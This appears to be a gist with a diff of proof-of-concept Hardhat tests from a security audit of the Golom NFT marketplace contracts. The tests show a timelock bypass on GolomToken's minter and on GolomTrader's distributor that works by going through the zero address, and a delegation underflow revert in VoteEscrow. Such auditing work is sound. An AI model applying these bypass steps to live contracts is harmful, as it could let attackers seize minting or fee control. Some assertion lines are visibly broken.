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Created August 1, 2022 13:55
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2022-07 Proof of concept for golom
diff --git a/test/GolomToken.specs.ts b/test/PocGolomToken.specs.ts
index 832c73f..faef12f 100644
--- a/test/GolomToken.specs.ts
+++ b/test/PocGolomToken.specs.ts
@@ -77,5 +77,26 @@ describe('GolomToken.sol', () => {
expect(golomToken.executeSetMinter())'GolomToken: wait for timelock');
+ it('should set the minter with timelock poc', async () => {
+ await golomToken.setMinter(await accounts[2].getAddress());
+ await golomToken.executeSetMinter();
+ expect(await golomToken.minter()) accounts[2].getAddress());
+ // 1. setMinter to zero address
+ await golomToken.setMinter("0x0000000000000000000000000000000000000000");
+ // 2. wait for timelock
+ const twoDays = 2 * 24 * 60 * 60;
+ await ethers.provider.send('evm_increaseTime', [twoDays]);
+ await ethers.provider.send('evm_mine', []);
+ // 3. executeSetMinter will set the mineter to zero address
+ await golomToken.executeSetMinter();
+ // 4. now one can setMinter any address without waiting for the timelock
+ await golomToken.setMinter(await accounts[3].getAddress());
+ await golomToken.executeSetMinter();
+ expect(await golomToken.minter()) accounts[3].getAddress());
+ });
diff --git a/test/GolomTrader.specs.ts b/test/PocGolomTrader.specs.ts
index c28ade8..8d5826f 100644
--- a/test/GolomTrader.specs.ts
+++ b/test/PocGolomTrader.specs.ts
@@ -1,3 +1,4 @@
// for all order types test
// if cancel by order is working and only the creater can cancel nobody else can cancel
// if cancel by nonce is working and only the creater can cancel nobody else can cancel
@@ -679,5 +680,18 @@ describe('Trader.sol', function () {
it('should set governance', async () => {
// Do something with the accounts
+ it('can bypass timelock poc', async () => {
+ // 0. distributor is already set in the before each
+ expect(await golomTrader.distributor());
+ // 1. reset distributor to zero without timelock
+ // condition: setDistributor was called only once (in the before each)
+ await golomTrader.connect(governance).executeSetDistributor();
+ const newDistributor = await maker.getAddress();
+ // 2. now owner can set distributor without timelock
+ await golomTrader.connect(governance).setDistributor(newDistributor);
+ expect(await golomTrader.distributor());
+ })
diff --git a/test/VoteEscrowDelegation.specs.ts b/test/PocVoteEscrowDelegation.specs.ts
index e69de29..23f9c93 100644
--- a/test/VoteEscrowDelegation.specs.ts
+++ b/test/PocVoteEscrowDelegation.specs.ts
@@ -0,0 +1,163 @@
+import { ethers, waffle } from 'hardhat';
+import { BigNumber, utils, Signer, constants } from 'ethers';
+import chai from 'chai';
+const { expect } = chai;
+// import artifacts
+const GolomTraderArtifacts = ethers.getContractFactory('GolomTrader');
+const RewardDistributorArtifacts = ethers.getContractFactory('RewardDistributor');
+const ERC721MockArtifacts = ethers.getContractFactory('ERC721Mock');
+const ERC1155MockArtifacts = ethers.getContractFactory('ERC1155Mock');
+const ERC20MockArtifacts = ethers.getContractFactory('ERC20Mock');
+const WETHArtifacts = ethers.getContractFactory('WETH');
+const GolomTokenArtifacts = ethers.getContractFactory('GolomToken');
+// import typings
+import { GolomToken as GolomTokenTypes } from '../typechain/GolomToken';
+import { GolomTrader as GolomTraderTypes } from '../typechain/GolomTrader';
+import { RewardDistributor as RewardDistributorTypes } from '../typechain/RewardDistributor';
+import { VoteEscrow as VoteEscrowTypes } from '../typechain/VoteEscrow';
+import { WETH as WETHTypes } from '../typechain/WETH';
+import { ERC721Mock as ERC721MockTypes } from '../typechain/ERC721Mock';
+import { ERC1155Mock as ERC1155MockTypes } from '../typechain/ERC1155Mock';
+import { ERC20Mock as ERC20MockTypes } from '../typechain/ERC20Mock';
+let testErc20: ERC20MockTypes;
+let testErc721: ERC721MockTypes;
+let testErc1155: ERC1155MockTypes;
+let weth: WETHTypes;
+let golomToken: GolomTokenTypes;
+let golomTrader: GolomTraderTypes;
+let voteEscrow: VoteEscrowTypes;
+let rewardDistributor: RewardDistributorTypes;
+let accounts: Signer[];
+let governance: Signer;
+let maker: any;
+let taker: any;
+let exchange: any;
+let prepay: any;
+let postpay: any;
+let receiver: "0x0000000000000000000000000000000000000000";
+let domain: any;
+const types = {
+ payment: [
+ { name: 'paymentAmt', type: 'uint256' },
+ { name: 'paymentAddress', type: 'address' },
+ ],
+ order: [
+ { name: 'collection', type: 'address' },
+ { name: 'tokenId', type: 'uint256' },
+ { name: 'signer', type: 'address' },
+ { name: 'orderType', type: 'uint256' },
+ { name: 'totalAmt', type: 'uint256' },
+ { name: 'exchange', type: 'payment' },
+ { name: 'prePayment', type: 'payment' },
+ { name: 'isERC721', type: 'bool' },
+ { name: 'tokenAmt', type: 'uint256' },
+ { name: 'refererrAmt', type: 'uint256' },
+ { name: 'root', type: 'bytes32' },
+ { name: 'reservedAddress', type: 'address' },
+ { name: 'nonce', type: 'uint256' },
+ { name: 'deadline', type: 'uint256' },
+ ],
+describe('VoteEscrowDelegation.sol', function () {
+ beforeEach(async function () {
+ accounts = await ethers.getSigners();
+ maker = accounts[0];
+ taker = accounts[1];
+ exchange = accounts[2];
+ prepay = accounts[3];
+ postpay = accounts[4];
+ governance = accounts[5];
+ receiver = "0x0000000000000000000000000000000000000000";
+ testErc20 = (await (await ERC20MockArtifacts).deploy()) as ERC20MockTypes;
+ testErc721 = (await (await ERC721MockArtifacts).deploy()) as ERC721MockTypes;
+ testErc1155 = (await (await ERC1155MockArtifacts).deploy()) as ERC1155MockTypes;
+ weth = (await (await WETHArtifacts).deploy()) as WETHTypes;
+ golomToken = (await (await GolomTokenArtifacts).deploy(await accounts[0].getAddress())) as GolomTokenTypes;
+ // deploy trader contract
+ golomTrader = (await (await GolomTraderArtifacts).deploy(await governance.getAddress())) as GolomTraderTypes;
+ rewardDistributor = (await (
+ await RewardDistributorArtifacts
+ ).deploy(
+ weth.address,
+ golomTrader.address,
+ golomToken.address,
+ await governance.getAddress()
+ )) as RewardDistributorTypes;
+ domain = {
+ name: 'GOLOM.IO',
+ version: '1',
+ chainId: 31337,
+ verifyingContract: golomTrader.address,
+ };
+ // set distributor
+ await golomTrader.connect(governance).setDistributor(rewardDistributor.address);
+ // await golomTrader.connect(governance).executeSetDistributor();
+ await maker.getAddress());
+ await testErc721.connect(maker).setApprovalForAll(golomTrader.address, true);
+ await testErc1155.connect(maker).setApprovalForAll(golomTrader.address, true);
+ // deploy ve
+ const TokenUriHelper = await ethers.getContractFactory("TokenUriHelper");
+ const tokenUriHelper = await TokenUriHelper.deploy();
+ await tokenUriHelper.deployed();
+ const VoteEscrowArtifacts = ethers.getContractFactory('VoteEscrow', {
+ libraries: {
+ TokenUriHelper: tokenUriHelper.address,
+ },
+ });
+ // VoteEscrow
+ voteEscrow = (await (await VoteEscrowArtifacts).deploy(golomToken.address)) as VoteEscrowTypes;
+ // For simplicity setting minter to governance
+ await golomToken.setMinter(await governance.getAddress());
+ await golomToken.executeSetMinter();
+ await golomToken.connect(governance).mint(await maker.getAddress(), 10000000);
+ await golomToken.connect(governance).mint(await taker.getAddress(), 100);
+ expect(await golomToken.balanceOf(await maker.getAddress()))'10000000');
+ expect(await golomToken.balanceOf(await taker.getAddress()))'100');
+ });
+ describe('#delegate', () => {
+ it('reverts poc', async () => {
+ // approve
+ await golomToken.approve(voteEscrow.address, 10);
+ await golomToken.connect(taker).approve(voteEscrow.address, 10);
+ const lockDuration = 7 * 24 * 3600; // 1 week
+ // get vote escrow for maker: id 1
+ expect(await voteEscrow.balanceOf(await maker.getAddress())).to.equal(0)
+ await voteEscrow.create_lock(10, lockDuration);
+ expect(await voteEscrow.ownerOf(1)).to.equal(await maker.getAddress())
+ expect(await voteEscrow.balanceOf(await maker.getAddress())).to.equal(1)
+ // get vote escrow for taker: id 2
+ expect(await voteEscrow.balanceOf(await taker.getAddress())).to.equal(0)
+ await voteEscrow.connect(taker).create_lock(10, lockDuration);
+ expect(await voteEscrow.ownerOf(2)).to.equal(await taker.getAddress())
+ expect(await voteEscrow.balanceOf(await taker.getAddress())).to.equal(1)
+ // cannot delegate: it reverts
+ expect(await voteEscrow.getVotes(2)).to.equal(0)
+ // delegate 1 to 2 : it reverts with
+ // panic code 0x11 (Arithmetic operation underflowed or overflowed outside of an unchecked block)
+ // await voteEscrow.delegate(1,2)
+ });
+ })
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